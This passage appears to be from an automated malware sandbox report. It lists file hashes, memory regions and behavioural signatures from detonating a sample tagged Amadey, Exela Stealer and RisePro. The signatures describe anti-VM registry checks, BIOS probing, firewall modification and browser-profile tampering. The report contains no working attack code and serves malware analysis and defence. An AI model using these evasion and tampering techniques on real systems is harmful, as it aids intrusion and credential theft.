SHA256 1c84bcb67ccef5e0d47438167b7b40b8b2fa5f0d75997b847e960a73d529f428
SHA512 fecf84da84b86e1d544f1b019c9696aa9ab97bc1e2a5002d1f71b3b22871cc4651b8a2c5339388015237aabb06fa801be1d13a3ca0ce171e0cb99b9826925bcf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d3d10523fdceb07a3b7f562ed22627ab
SHA1 155a59a6359bd040f9fd9985e2ecd1cb203803c8
SHA256 592f8d402b5f6f782f8e9955270a89204c19c0155c8f02679caf308054781272
SHA512 6176c433a8490229baf85a09406017d3cc47ccebdb7d2df7007856c941b6c181914d2f4d14a08f363ce8a36f807824724fc747265bdf2ef164b999c175807e30

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 e784169b21c29c4f8df181b956067e46
SHA1 fbb75ce07e0b520e5e9e8a2efbb53da3a5696509
SHA256 935fda5726cce6a6939e0959292585a0439e0c9f764628aa0edf43ae869f997f
SHA512 3e838227eb7e2b0c2da6aa62e1ca7691abe6c427a9671fca111e7cc4e509213eab947d5046d814f68b1cff5c71e14743518287e8b48393cceffdb71e322de8e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\cs\messages.json

MD5 0adcbaf7743ed15eb35ac5fb610f99ed
SHA1 189e00f2a1f4ebc7443930e05acc3dcb7ac07f3b
SHA256 38af7c2222357b07b4e5f0292d334d66f048c12f1c85ca34215104baa75bc097
SHA512 e2e4fd47bb3625d050b530bc41df89501832d5a43e4bb21efea0102a6d04c130cd5b7a4e4cafdac99344eb271401c6e6f93440e55d77013695c1ab3bba1b4a89

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\ca\messages.json

MD5 7afdcfbd8baa63ba26fb5d48440dd79f
SHA1 6c5909e5077827d2f10801937b2ec74232ee3fa9
SHA256 3a22d19fd72a8158ad5ec9bfa1dcdf70fdb23c0dee82454b69c2244dfd644e67
SHA512 c9acb7850d6392cac39ed4409a7b58c31c4e66def628e9b22a6f5a6a54789e2c67c09427bd57de1ff196bf79eaf1d7dc7423ba32f1ab1764b5a25ef706cbc098

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\be\messages.json

MD5 2f2efb9c49386fe854d96e8aa233a56f
SHA1 42505da3452e7fd4842ed4bd1d88f8e3e493f172
SHA256 a93a368b5c7023842f9d8b0ee5ef9638c03c808212efefadf7331d3b65482ea3
SHA512 c9bd97f3487ab695dd9245a14058ed70b3be61b6bf21b281efe022a954c17d86208a4004e157ef892af84764ac290c6f97345a50ebeb9d11c16490979859b934

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json

MD5 a82b72c607df2c19dc29f6a672b03bca
SHA1 d8987e7bc86d5b8b5be797465d598c290b15f51b
SHA256 fe074106c8fef7013a15593b0b08211937aa67fc32d6da2e5929ee2f17b19142
SHA512 4db816a6fec8940a358b62915739e0c4f6b86bb310d5870b8b040247bba56a0f2941cfa94029559985730a13064724ed838b55f054541d22ea88d2d25bab7f1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\icon48.png

MD5 49443c42dcbe73d2ccf893e6c785be7f
SHA1 3a671dcb2453135249dcc919d11118f286e48efc
SHA256 e7cf247ccb1b365cd7a14fadd85686b83a9e7b7728590547b8466cafcea757ee
SHA512 c98af48fcd71c59a8e76e74b5268e26ad8b3db9cb80edf0517b70bb4476881cbb4ec55b9c3fd858925ef2f2889679db81190a07b4fd7088179e74f1434cac678

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\icon16.png

MD5 b307bd8d7f1320589cac448aa70ddc50
SHA1 aaed2bfa8275564ae9b1307fa2f47506c1f6eccf
SHA256 61b02a1fca992be08f1a3df547b29b424767d94702e4d99129c2f1ca2e67a113
SHA512 74883fec0c94233231d17461f36e9a5e99cd4e8c2726a918519a8025cb75aaaab92a8dee612470cc4e3cc361fc0c12f5778e016b1570792ac3f4bf0b3bcfb103

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\icon128.png

MD5 77fbb02714eb199614d1b017bf9b3270
SHA1 48149bbf82d472c5cc5839c3623ee6f2e6df7c42
SHA256 2f5282c25c8829a21a79a120e3b097e5316ddbd0f866508b82e38766c7844dba
SHA512 ff5078d585a1ab3bd4e36e29411376537650acbcb937fdad9ac485a9dd7bcb0f593cc76672572a465eb79894ab6b2eddd6a3da21c165ab75c90df020d3e42823

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\ficon128.png

MD5 d2cec80b28b9be2e46d12cfcbcbd3a52
SHA1 2fdac2e9a2909cfdca5df717dcc36a9d0ca8396a
SHA256 6d38e0be2e6c189de3e4d739bae9986ee365a33baf99a9234e5c9effb44b791a
SHA512 89798889d41cfc687a31c820aea487722b04ea40f7fd07ce899a0e215b7b1703380188ba103825a4b863f8cbca76430bfc437705630f0bfcaffd50a78c2bb295

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\de\messages.json

MD5 3c8e1bfc792112e47e3c0327994cd6d1
SHA1 5c39df5dbafcad294f770b34130cd4895d762c1c
SHA256 14725b60e289582b990c6da9b4afcbef8063eb3414f9c6020023f4d2bac7bb1e
SHA512 ce7c707e15725ffb73c5915ee6b381ca82eda820ae5ec2353a4e7147de297f6367945b34010b4e4c41d68df92a4ccf9a2b5df877f89526ca6b674bae00cabe9e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\uk\messages.json

MD5 01f32be832c8c43f900f626d6761bbaa
SHA1 3e397891d173d67daa01216f91bd35ba12f3f961
SHA256 1faeed8ec9ba451ee06b42999695771fd8a400dd6e3a699b755824830852e4a0
SHA512 9db085d75fb794c20df7060f603a7ac34481de3ae00f1260cc8e5a8a510234f383f71a85db48b6e2d8f2042646c08dd93a91a39ffe990f660f3cb9147fa4d42a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\tr\messages.json

MD5 e5c0575e52973721b39f356059298970
SHA1 b6d544b4fc20e564bd48c5a30a18f08d34377b13
SHA256 606c5c1d88157b4eed536e26d14f456ca05b3fdf5f30d1e0e30a52aaf2bbbf37
SHA512 dba47859af5e2462b6da0b397f333825704bd75a3453d3d86eee2a35a7c6535d290c240b0e6a85b9d472d0d952aa9cd48c6e3af7c79c02e0f09f6e9932c146dd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sv\messages.json

MD5 66cf0340cf41d655e138bc23897291d3
SHA1 fff7a2a8b7b5e797b00078890ec8a9e0ddec503d
SHA256 d41042f78b7838b63ae141da4f4a7f67ea3f8e0fab66ea5111a1482867cf6e2f
SHA512 6411dea0ac928463317ad3ef418ac2f01e8621f64e024cb43fab52b132e08c7aa205ffc97e99f31b8dd824d19a403e7befbf7848e4421f031ed0a0b9b12e2c52

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sq\messages.json

MD5 a84d08782b2ff6f733b5b5c73ca3ce67
SHA1 c3ee1bbc80a21d5c6618b08df3618f60f4df8847
SHA256 22737aee22639043d8ab244e633a42e37e6ac7cccd2e4103b9f8fccfbcecd0d6
SHA512 436b6bca82272f918341bf2ab673a101c106e048859a4cd204bf83313588d2e9db30c4b3a8b7053544305b3f7a6b905a6c35c226923eb93ca3d55e8a128fc1f5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sl\messages.json

MD5 816d952fe0f9413e294b84829d5a6b96
SHA1 cfd774e6afe6e04158cc95bab0857a5e52251581
SHA256 5d12f8f83c157b62c22ccf5d66789855f9e08f63ca19890318ed3c6a9501538f
SHA512 dccf1e19401e2a7b1ce2f81d221da78b939e3912455a145baf4f4867e1e9c8c39136a70f7cd34d5c9f2cd22e87223a9246803b4c853f4736cb050554a56b1b83

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sk\messages.json

MD5 b1eb0ab05de1272667be2558dea84951
SHA1 dfa723146cba15c190cf19fb3d7c84ffa12cd302
SHA256 ee50762de69cb198e12982c1871ee4e7aaf1588b2dde683fe3946825c95adc73
SHA512 af110a7bc225c656e0a97c36555d67f3d0fb5884b8e2c9ab7565e5faa7987781fbf42e8020e30771b997aaba05540a2fa2eeb6c31798d275435c85e69014f546

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\ru\messages.json

MD5 f0f33cfa8b275803c1c69cc2e8c58b98
SHA1 653b3e8ee7199e614b25128e7f28e14bf8fd02cb
SHA256 c28dbe7f5b5e95ecbeda2fbd517dab12e51810ae1e76079c2bcfd7738b7ae24c
SHA512 1ee8d9015ffb5c68ce322b69e8f90454239385133a1ed123e9d4f0841eec92012e0dbffe64c9f2ebb60fd5efc6e1525be0491a7433b0a5b184af3fb44e1a60c5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\no\messages.json

MD5 43f1d4d731e2ab85a2fb653c63b4326e
SHA1 94f7d16dcf66186b6f40d73575c4a1942d5ca700
SHA256 1dcd3f41f085df98beea4609c2a3c07f2796e909c8bb342225d0c14a2e37d32a
SHA512 ec9473a8a06090167b727b923c745f58a59bd76fe2cf259d7b1603468c5bfe2eb3827e67c0247d9e5a6742ee06ac7558b8532bacc1519215d953ec529b1b3e43

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\nl\messages.json

MD5 cb5f1996eceef89fb28c02b7eac74143
SHA1 df757b1cd3b24745d1d6fdb8538ceba1adf33e3e
SHA256 5895554b39c229627fdd2440f51ee87a6505056bde8e008746682738c42a307e
SHA512 667257911527d27d590b7940ed4ce687465d59ec8fca9d6aa06529a55a3e8139488745c13d77c92af8f94aa1908e5dcef941f0a23544d13529c66d38b25883c5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\mk\messages.json

MD5 616866b2924c40fda0a60b7988a1c564
SHA1 ca4750a620dac04eae8ff3c95df6fd92b35c62a7
SHA256 315e5ab70774f9b8247d3eae0a58e15bd3a32f8202e1f1b8ed90c2b2e633d865
SHA512 1fd19fd12c471f3b410fbe5dd39bee52795735985655840cb73ba2191a782c822253fe2e5d6fe7548d9e4f1d735845f07b5babed5141ca801ada60052a5fd8a3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\lv\messages.json

MD5 b676b28af1bc779eb07f2ad6fee4ec50
SHA1 36f12feab6b68357282fc4f9358d9e2a6510661a
SHA256 1ac599594e814cd69a4c7a8180d75fc8aad9c9af54e9411611b3c03a82947ef4
SHA512 d982861de053e3225af04377134013d596b1dc069d7faf27e087e19680b575af744a4d8bc8b32f858ed0e69a26527be3df1cd006da78695fbea3595c4259ee1b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\lt\messages.json

MD5 f46a2ab198f038019413c13590555275
SHA1 160b9817b28d3539396399aa02937d3e2f4796ac
SHA256 e01b215a6ef7446522b2701fc72888944d551627a331a6378a5a0b5c402fdc65
SHA512 5834ec16be2e3c7a6dc39d038d58a07adf5e842581fff80da92fe5b2c769e8e7db6f3dd69a90e5702535f5dfd6ab2787251dcfd0a0649149ab606f02c40e8c33

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\it\messages.json

MD5 1c49f2f8875dcf0110675ead3c0c7930
SHA1 2124a6ac688001ba65f29df4467f3de9f40f67b2
SHA256 d6a6b8bb2706268726346d7cf12e2bc1e55dd9d730093de89d8962293b769cc0
SHA512 ab0da2797705a043fd4dfe5bd98c3d2a47d596ac9ac5edeaa709969615c4dab0514d83ae5a1ef226989c05e4603d614d0a22f70931c73216c36f6b493e5acc3f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\hu\messages.json

MD5 eec60f64bdaa23d9171e3b7667ecdcf9
SHA1 9b1a03ad7680516e083c010b8a2c6562f261b4bb
SHA256 b4b490e4fe6eb83b9e54f84c9f50e83866e78d0394bcb03353c6e61f76d1ac34
SHA512 c0dda2afcaae5e44eda8462dc8536c4507c1087fc54b18fb40c2894784776cab46b1d383c3113c0e106612efe71b951672deecc01b0447956e1dced93cca42b4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fr\messages.json

MD5 6a9c08aa417b802029eb5e451dfb2ffa
SHA1 f54979659d56a77afab62780346813293ad7247b
SHA256 8f4ed00e79b8e990a32282eea13f8e1d0faa9cf8b21168643455b206e4e3d08c
SHA512 b5a504b5559d0e955a5a3cf2e0ae37a64cdad75aaa7c82d01757d4a2f541026dbfb1cb8373c932a0e003f1951e88e2f5a3fb7fc9992d67388f7184f00a8c1402

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fi\messages.json

MD5 0c79b671cd5e87d6420601c00171036c
SHA1 8c87227013aca9d5b9a3ed53a901b6173e14b34b
SHA256 6e13de5626ff0cb1c1f23b3dde137fcfc82f3420e88689b9e8d077ab356122ac
SHA512 bf956a7627feced1f6dba62fcfc0839a32573c38de71a420e748ce91e2a5e4f93dab67405174ba0d098ea7c1f66fb49b5a80d4f5d1ddc0fc2b08d033656d0e25

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\et\messages.json

MD5 4ebb37531229417453ad13983b42863f
SHA1 8fe20e60d10ce6ce89b78be39d84e3f5210d8ecd
SHA256 ff9d868d50e291be9759e78316c062a0ec9bcbbb7c83b8e2af49a177dda96b22
SHA512 4b7987c2fb755bbc51d5a095be44457f0188b29964e9820156903d738398d2b7f2c95629a40abdca016e46cad22a99c35039ee784c01860dab44f4b7d02a5980

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_TO\messages.json

MD5 d0e9e33528391591d94c378a7a6cb44c
SHA1 07fa25e355c0052e8fa87a235b4cb829a7ec599d
SHA256 8b942a565661f5706684838f81cb8613fbf6259f132b184036edf5f71e507c31
SHA512 7d8ed995efec76d582fa8f32f6a2312f0ed5b32a65fb92edb69ca3246b4d6d4544291894d68c3576dbeffb90103238bbe895c4ed8d5e8fc07fd1248356448fc6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\el\messages.json

MD5 177719dbe56d9a5f20a286197dee3a3b
SHA1 2d0f13a4aab956a2347ce09ad0f10a88ec283c00
SHA256 2e2ae3734b84565b2a6243fe4585dd6a0f5db54aae01fa86b6f522dd1ff55255
SHA512 ff10ae14ce5f7ed9b0612006730f783e1033304e511ccf9de68caeb48cc54e333c034f14cac63c3ea07c84a8f0f51c7f929b11d110913fa352562d43947798b5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\da\messages.json

MD5 372550a79e5a03aab3c5f03c792e6e9c
SHA1 a7d1e8166d49eab3edf66f5a046a80a43688c534
SHA256 d4de6ea622defe4a521915812a92d06d29065dacb889a9995a9e609bb02f2cfb
SHA512 4220dfce49f887bf9bf94bb3e42172ae0964cfb642343a967418ff7855c9c45455754ebf68c17f3d19fc7c6eb2c1b4725103bc55c9c56715941740897c19575f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_TO\messages.json

MD5 098eff77ce6efb20a8eb808ab7f4a3ce
SHA1 c71311a83fbfd9d239d46bac3246145608eb1939
SHA256 e58c02fb4872008c22fb1653fb26506f162995debc5a8c05164ee85cf57895c1
SHA512 c60836ad4afd9fab3135ea35d3b1267a9d01e48556c07915f63c10385097ebfe7bb9aa31191cfd89c10bc20d66351f9af659fa95ecf650759909c3f82d6e6dfb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 2aabf48fbb9725157d6d184929a6b91f
SHA1 5b428a3161c823e9cc774e772d6c428ab10b0df9
SHA256 4e8160be65b0c3eaa957b8222b5dc29ce8d5cc4448079038b67721941db88a74
SHA512 20f22c45f4f4f07ef345a641fd0f7599eea1fe656dedbcedfd84d95a81f6f0fc8f0327c91c8f954a5baaf7eddf974f2ca0700aed3d224e1ac12640a7124bee06

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

MD5 d1fa884d644072cd6e55fa749f695c9d
SHA1 3761f71f4f48501ceaf0562b7f0727dd000f6323
SHA256 465d0005b45a4903cb271c3641e9ca9a46e702450a954196aa32cda8366be3c8
SHA512 661d3101d9de577540b65aae37e30c2d637906383b758fdbe809d6e5eb13ac4cbd885ed908761502e66b36ca9fd601a85c31d2e88253a7144ff98cdf1250d49e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\en_TO\messages.json

MD5 31a3accb4b5844a9043c2c0b89ba240f
SHA1 5715e6e0445ae83fa4a43e44d5284fed236ff156
SHA256 aade3240e37029af76c6987f4f64a27be76a8d3a5fc3fe03ad10c7283585d271
SHA512 7ca20ca0786f61e20be5e32958f95cefed6ce996a5335eeeff43ef5687f121dce569579931435412cfdf0d2738c53205912918f59cdd153e30590abce0fee6c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 0fd1cdd83fd9553f812a8c83d43b60bc
SHA1 2b040189628fba332c4deafb7dcf95a9a5485232
SHA256 3472d61927b5f1782d28955d7d841269d03b82c066e45e7def6e998b3f4f5617
SHA512 9a772bcd02fc5ea99a97ef2cdbac324433708588869e70aee862915fe18413b062721124062a2e17d3e722ea396ad92b473d96ecc5498539af71b3088caa4954

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\h6dhg2l4.default-release\searchplugins\cdnsearch.xml

MD5 2869f887319d49175ff94ec01e707508
SHA1 e9504ad5c1bcf31a2842ca2281fe993d220af4b8
SHA256 49dd61e19d4541f1e695b66847d0bf99bc08952ba41b33a69c2e297dfa282d15
SHA512 63673c1ede47fda14dea78483c6319132a849db3b35953e43704aa49cfb6d14e42d74e0eaf93f4cdb7632c85f368d484ac111687127d2b87a3e264949085c76b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b90b53cbc942af310b2ca7e0f04d9bcb
SHA1 f02266c7e08959cb6db881132578a56429c185a5
SHA256 816d3fb6b91ed0debda60147de5ca7a48e1e8f443b88aed3f63392b3d814522d
SHA512 b0dad4886ccb0dfcf0822cd2494e3958537e524d4d919ae623676d054960f3af19932c109748090bf09bac14e9281595876dd1cb4ee030a8fd5b58b885282253

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 87803b327a1e5f867ba0db76a0fc6196
SHA1 2fd4bd2731b6f1c863bf7ca928c6b6c7c5084f2d
SHA256 b787290ff4bfa0ff59f0119bd1020897a79529cc4da9eb088193e9cd8b67ab43
SHA512 a80378a737af93f937a16377059d0ad1f4734355c7aeb866ba3c0ca448d7ad0672249dbf5fa26d9099fac5fda8090de2b1e4304916da7df2373e65bd4d3efef5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fc403bc54f7521ef762822e0571ec3ec
SHA1 fcf5916855a7cc0139d8e13488e43971a4f9f196
SHA256 dfb36ea693437ce5abfe919842003ec2fafde1e61b5c8d4c51423bce4b839392
SHA512 0427e479e9026f215e4a77b389b6951743f1cd2e0c45cf7d0947857ff1f060e9eb6f66a4e687b00d54b5c1a390a53776456dac173414650cefadd527bc8fc7f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3789419c-1f50-4c59-b435-5eb1fab081c2.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 149b08d923a953422cd884c6945bc7cb
SHA1 c2b85747f82dc02ccb2c074492bac6588fe6e90b
SHA256 f56332fb39727fc198188010fa529f03e1d0ae60d377f00cddeebe88bc6bc17f
SHA512 cf4e58d8a2c666008c2394c51e94463ec30a1467bfb8b1c0d2668179a8e77bd9ce550d13565b1c081399bd4fdf30e6fe03013895abcde8bca33843007fbeb56e

memory/5604-1858-0x0000000000400000-0x000000000046E000-memory.dmp

memory/5604-1864-0x0000000008490000-0x00000000084DC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 589c49f8a8e18ec6998a7a30b4958ebc
SHA1 cd4e0e2a5cb1fd5099ff88daf4f48bdba566332e
SHA256 26d067dbb5e448b16f93a1bb22a2541beb7134b1b3e39903346d10b96022b6b8
SHA512 e73566a037838d1f7db7e9b728eba07db08e079de471baca7c8f863c7af7beb36221e9ff77e0a898ce86d4ef4c36f83fb3af9c35e342061b7a5442ca3b9024d2

memory/5096-1888-0x0000000000750000-0x0000000000C05000-memory.dmp

memory/3020-1887-0x0000000000700000-0x0000000000BAF000-memory.dmp

memory/5096-1890-0x0000000000750000-0x0000000000C05000-memory.dmp

memory/3020-1892-0x0000000000700000-0x0000000000BAF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-31 12:24

Reported

2024-05-31 12:27

Platform

win11-20240426-en

Max time kernel

150s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe"

Signatures

Amadey

trojan amadey

Exela Stealer

stealer exelastealer

RisePro

stealer risepro

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\1000004002\689e56283d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\1000004002\689e56283d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\1000004002\689e56283d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
